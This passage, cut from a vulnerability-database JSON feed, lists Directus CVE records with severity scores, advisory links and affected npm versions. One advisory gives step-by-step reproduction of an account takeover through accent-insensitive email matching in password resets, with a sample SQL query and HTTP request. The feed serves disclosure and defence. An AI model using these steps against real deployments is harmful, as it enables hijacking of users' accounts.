`directus_users`.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-27481","reference_id":"","reference_type":"","scores":[{"value":"0.00301","scoring_system":"epss","scoring_elements":"0.53689","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-27481"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/pull/14829","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:10Z/"}],"url":"https://github.com/directus/directus/pull/14829"},{"reference_url":"https://github.com/directus/directus/pull/15010","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:10Z/"}],"url":"https://github.com/directus/directus/pull/15010"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-27481","reference_id":"CVE-2023-27481","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-27481"},{"reference_url":"https://github.com/advisories/GHSA-m5q3-8wgf-x8xf","reference_id":"GHSA-m5q3-8wgf-x8xf","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-m5q3-8wgf-x8xf"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-m5q3-8wgf-x8xf","reference_id":"GHSA-m5q3-8wgf-x8xf","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:10Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-m5q3-8wgf-x8xf"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/63065?format=json","purl":"pkg:npm/directus@9.16.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3cgw-zr3k-3fen"},{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-7mea-hn69-wuhu"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-8r4e-a1vf-9bd9"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-bh2g-b9dd-d3d9"},{"vulnerability":"VCID-eb8p-vqjt-yfb8"},{"vulnerability":"VCID-ejme-tqn4-byhk"},{"vulnerability":"VCID-eygf-cb4y-hqd3"},{"vulnerability":"VCID-g34r-4mb9-afab"},{"vulnerability":"VCID-gjju-tu4e-gqfc"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-hpbn-rr29-2yck"},{"vulnerability":"VCID-hrqc-8err-4fbx"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-kqs7-8txh-jyc8"},{"vulnerability":"VCID-m3wb-sstx-v3d6"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-msb5-197k-a3er"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-pwt9-krmn-7kdd"},{"vulnerability":"VCID-szny-2sbf-v7de"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-v4vz-smcx-gygb"},{"vulnerability":"VCID-wgag-36wa-qyay"},{"vulnerability":"VCID-wn2j-dtpz-hye1"},{"vulnerability":"VCID-xc7t-gwaz-ckeu"},{"vulnerability":"VCID-xt9c-32g5-mqes"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"},{"vulnerability":"VCID-yutw-33sk-5fg3"},{"vulnerability":"VCID-yz34-qwam-wbcn"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.16.0"}],"aliases":["CVE-2023-27481","GHSA-m5q3-8wgf-x8xf"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-et4m-8y15-9fb9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/17177?format=json","vulnerability_id":"VCID-eygf-cb4y-hqd3","summary":"Insertion of Sensitive Information into Log File\nDirectus is a real-time API and App dashboard for managing SQL database content. Prior to version 9.23.3, the `directus_refresh_token` is not redacted properly from the log outputs and can be used to impersonate users without their permission. This issue is patched in version 9.23.3.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-28443","reference_id":"","reference_type":"","scores":[{"value":"0.00061","scoring_system":"epss","scoring_elements":"0.19237","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-28443"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/blob/7c479c5161639aac466c763b6b958a9524201d74/api/src/logger.ts#L13","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-21T15:28:44Z/"}],"url":"https://github.com/directus/directus/blob/7c479c5161639aac466c763b6b958a9524201d74/api/src/logger.ts#L13"},{"reference_url":"https://github.com/directus/directus/commit/349536303983ccba68ecb3e4fb35315424011afc","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-21T15:28:44Z/"}],"url":"https://github.com/directus/directus/commit/349536303983ccba68ecb3e4fb35315424011afc"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-28443","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-28443"},{"reference_url":"https://github.com/advisories/GHSA-8vg2-wf3q-mwv7","reference_id":"GHSA-8vg2-wf3q-mwv7","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8vg2-wf3q-mwv7"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-8vg2-wf3q-mwv7","reference_id":"GHSA-8vg2-wf3q-mwv7","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-21T15:28:44Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-8vg2-wf3q-mwv7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/63229?format=json","purl":"pkg:npm/directus@9.23.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3cgw-zr3k-3fen"},{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-4wtt-tffj-bbeb"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-7mea-hn69-wuhu"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-8r4e-a1vf-9bd9"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-bh2g-b9dd-d3d9"},{"vulnerability":"VCID-eb8p-vqjt-yfb8"},{"vulnerability":"VCID-ejme-tqn4-byhk"},{"vulnerability":"VCID-g34r-4mb9-afab"},{"vulnerability":"VCID-gjju-tu4e-gqfc"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-hhwc-1jxe-7yaw"},{"vulnerability":"VCID-hpbn-rr29-2yck"},{"vulnerability":"VCID-hrqc-8err-4fbx"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-jmem-8d4q-x7br"},{"vulnerability":"VCID-kqs7-8txh-jyc8"},{"vulnerability":"VCID-m3wb-sstx-v3d6"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-msb5-197k-a3er"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-pwt9-krmn-7kdd"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-wgag-36wa-qyay"},{"vulnerability":"VCID-wn2j-dtpz-hye1"},{"vulnerability":"VCID-xc7t-gwaz-ckeu"},{"vulnerability":"VCID-xt9c-32g5-mqes"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"},{"vulnerability":"VCID-yutw-33sk-5fg3"},{"vulnerability":"VCID-yz34-qwam-wbcn"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.23.3"}],"aliases":["CVE-2023-28443","GHSA-8vg2-wf3q-mwv7"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-eygf-cb4y-hqd3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/292370?format=json","vulnerability_id":"VCID-g34r-4mb9-afab","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-30352","reference_id":"","reference_type":"","scores":[{"value":"0.00144","scoring_system":"epss","scoring_elements":"0.34407","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-30352"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/ac5a9964d9926f20dc063a74cb417dc7bbad676d","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-03-27T15:14:43Z/"}],"url":"https://github.com/directus/directus/commit/ac5a9964d9926f20dc063a74cb417dc7bbad676d"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-7wq3-jr35-275c","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-03-27T15:14:43Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-7wq3-jr35-275c"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-30352","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-30352"},{"reference_url":"https://github.com/advisories/GHSA-7wq3-jr35-275c","reference_id":"GHSA-7wq3-jr35-275c","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-7wq3-jr35-275c"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/195096?format=json","purl":"pkg:npm/directus@11.5.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-5u8r-s8tz-guhm"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-bh2g-b9dd-d3d9"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-hpbn-rr29-2yck"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-pwt9-krmn-7kdd"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-wn2j-dtpz-hye1"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.5.0"}],"aliases":["CVE-2025-30352","GHSA-7wq3-jr35-275c"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-g34r-4mb9-afab"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/19589?format=json","vulnerability_id":"VCID-gjju-tu4e-gqfc","summary":"Directus has MySQL accent insensitive email matching\n## Password reset vulnerable to accent confusion\n\nThe password reset mechanism of the Directus backend is implemented in a way where combined with (specific, need to double check if i can work around) configuration in MySQL or MariaDB. As such, it allows attackers to receive a password reset email of a victim user, specifically having it arrive at a similar email address as the victim with a one or more characters changed to use accents. \n\nThis is due to the fact that by default MySQL/MariaDB are configured for accent-insenstive and case-insensitve comparisons.\n\nMySQL weak comparison:\n```sql\nselect 1 from directus_users where 'julian@cure53.de' = 'julian@cüre53.de';\n```\n\nThis is exploitable due to an error in the API using the supplied email address for sending the reset password mail instead of using the email from the database.\n\n### Steps to reproduce:\n\n1. If the attacker knows the email address of the victim user, i.e., `julian@cure53.de`. (possibly just the domain could be enough for an educated guess)\n2. A off-by-one accented domain `cüre53.de` can be registered to be able to receive emails.\n3. With this email the attacker can request a password reset for `julian@cüre53.de`. \n```http\nPOST /auth/password/request HTTP/1.1\nHost: example.com\n[...]\n{\"email\":\"julian@cüre53.de\"}\n```\n4. The supplied email (julian@cüre53.de) gets checked against the database and will match the non-accented email `julian@cure53.de` and will continue to email the password reset link to the provided email address instead of the saved email address.\n5. With this email the attacker can log into the target account and use it for nefarious things\n\n### Workarounds\nShould be possible with collations but haven't been able to confirm this. \n\n### References\n- https://www.monolune.com/articles/what-is-the-utf8mb4_0900_ai_ci-collation/\n- https://dev.mysql.com/doc/refman/8.0/en/charset-unicode-sets.html","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-27295","reference_id":"","reference_type":"","scores":[{"value":"0.00604","scoring_system":"epss","scoring_elements":"0.69922","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-27295"},{"reference_url":"https://dev.mysql.com/doc/refman/8.0/en/charset-unicode-sets.html","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://dev.mysql.com/doc/refman/8.0/en/charset-unicode-sets.html"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/a8ef790ea2d28b1727f9027d99bd360920d57919","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus/commit/a8ef790ea2d28b1727f9027d99bd360920d57919"},{"reference_url":"https://www.monolune.com/articles/what-is-the-utf8mb4_0900_ai_ci-collation","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.monolune.com/articles/what-is-the-utf8mb4_0900_ai_ci-collation"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-27295","reference_id":"CVE-2024-27295","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-27295"},{"reference_url":"https://github.com/advisories/GHSA-qw9g-7549-7wg5","reference_id":"GHSA-qw9g-7549-7wg5","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qw9g-7549-7wg5"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-qw9g-7549-7wg5","reference_id":"GHSA-qw9g-7549-7wg5","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-03-05T19:45:59Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-qw9g-7549-7wg5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/68026?format=json","purl":"pkg:npm/directus@10.8.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3cgw-zr3k-3fen"},{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-4wtt-tffj-bbeb"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-5u8r-s8tz-guhm"},{"vulnerability":"VCID-7mea-hn69-wuhu"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-8r4e-a1vf-9bd9"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-bh2g-b9dd-d3d9"},{"vulnerability":"VCID-eb8p-vqjt-yfb8"},{"vulnerability":"VCID-g34r-4mb9-afab"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-hhwc-1jxe-7yaw"},{"vulnerability":"VCID-hpbn-rr29-2yck"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-kqs7-8txh-jyc8"},{"vulnerability":"VCID-m3wb-sstx-v3d6"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-msb5-197k-a3er"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-pwt9-krmn-7kdd"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-wgag-36wa-qyay"},{"vulnerability":"VCID-wn2j-dtpz-hye1"},{"vulnerability":"VCID-xc7t-gwaz-ckeu"},{"vulnerability":"VCID-xt9c-32g5-mqes"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"},{"vulnerability":"VCID-yutw-33sk-5fg3"},{"vulnerability":"VCID-yz34-qwam-wbcn"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.8.3"}],"aliases":["CVE-2024-27295","GHSA-qw9g-7549-7wg5"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gjju-tu4e-gqfc"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/191782?format=json","vulnerability_id":"VCID-gpfk-nsnr-4khn","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-23080","reference_id":"","reference_type":"","scores":[{"value":"0.00116","scoring_system":"epss","scoring_elements":"0.30093","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-23080"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/6da3f1ed5034115b1da00440008351bf0d808d83","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus/commit/6da3f1ed5034115b1da00440008351bf0d808d83"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-23080","reference_id":"CVE-2022-23080","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-23080"},{"reference_url":"https://www.mend.io/vulnerability-database/CVE-2022-23080","reference_id":"CVE-2022-23080","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.mend.io/vulnerability-database/CVE-2022-23080"},{"reference_url":"https://github.com/advisories/GHSA-5h75-pvq4-82c9","reference_id":"GHSA-5h75-pvq4-82c9","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-5h75-pvq4-82c9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/60235?format=json","purl":"pkg:npm/directus@9.7.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3cgw-zr3k-3fen"},{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-8r4e-a1vf-9bd9"},{"vulnerability":"VCID-9gba-zszk-p3h6"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-bh2g-b9dd-d3d9"},{"vulnerability":"VCID-eb8p-vqjt-yfb8"},{"vulnerability":"VCID-ejme-tqn4-byhk"},{"vulnerability":"VCID-et4m-8y15-9fb9"},{"vulnerability":"VCID-eygf-cb4y-hqd3"},{"vulnerability":"VCID-g34r-4mb9-afab"},{"vulnerability":"VCID-gjju-tu4e-gqfc"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-hpbn-rr29-2yck"},{"vulnerability":"VCID-hrqc-8err-4fbx"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-kqs7-8txh-jyc8"},{"vulnerability":"VCID-m3wb-sstx-v3d6"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-msb5-197k-a3er"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-pwt9-krmn-7kdd"},{"vulnerability":"VCID-szny-2sbf-v7de"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-v4vz-smcx-gygb"},{"vulnerability":"VCID-wgag-36wa-qyay"},{"vulnerability":"VCID-wn2j-dtpz-hye1"},{"vulnerability":"VCID-xt9c-32g5-mqes"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"},{"vulnerability":"VCID-yutw-33sk-5fg3"},{"vulnerability":"VCID-yz34-qwam-wbcn"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.7.0"}],"aliases":["CVE-2022-23080","GHSA-5h75-pvq4-82c9"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gpfk-nsnr-4khn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/330173?format=json","vulnerability_id":"VCID-gwwu-p9jt-eke3","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35413","reference_id":"","reference_type":"","scores":[{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.05028","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35413"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"